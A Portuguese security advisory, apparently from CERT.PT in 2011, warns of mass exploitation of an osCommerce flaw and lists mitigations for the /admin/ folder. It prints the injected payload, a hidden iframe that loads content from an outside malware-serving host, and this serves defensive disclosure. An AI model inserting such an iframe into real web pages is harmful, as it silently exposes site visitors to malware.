Exploração Massiva de Vulnerablidades no osCommerce

: Criado em segunda, 01 agosto 2011 16:53

Tem sido observado nos últimos dias, a exploração massiva de uma vulnerabilidade não especificada existente no osCommerce.

Diversos utilizadores maliciosos,têm aproveitado esta vulnerabilidade de forma a atacarem milhões de sistemas por todo o mundo,com vista a infectarem o utilizador final com malware.

Sistemas Operativos Implicados:	Microsoft Windows, GNU/Linux
Aplicações Implicadas:	osCommerce

I. Descrição

Tem sido observado, nos últimos dias, a exploração massiva de uma vulnerabilidade não especificada existente no OsCommerce.

Existem relatos que diversos utilizadores maliciosos, têm aproveitado esta vulnerabilidade de forma a atacarem milhões de sistemas por todo o mundo, com vista a infectarem o utilizador final com malware.

Uma vez a vulnerabilidade explorada, é injectado o seguinte código no website:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'>

II. Solução

Ainda não existe uma resposta oficial por parte do fabricante. No entanto, os Administrador de Sistemas poderão tomar as seguintes medidas como forma de prevenção:

Renomear a pasta /admin/
Bloquear o acesso à pasta /admin/ através do ficheiro .htaccess;
Bloquear o acesso aos ficheiros define_language.php e file_manager.php;

III. Referências

Armonize.com

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html#vulnerability

Autenticação Federada

Missão

O CERT.PT tem como missão contribuir para o esforço de cibersegurança nacional nomeadamente no tratamento e coordenação da resposta a incidentes, na produção de alertas e recomendações de segurança e na promoção de uma cultura de segurança em Portugal.

PT EN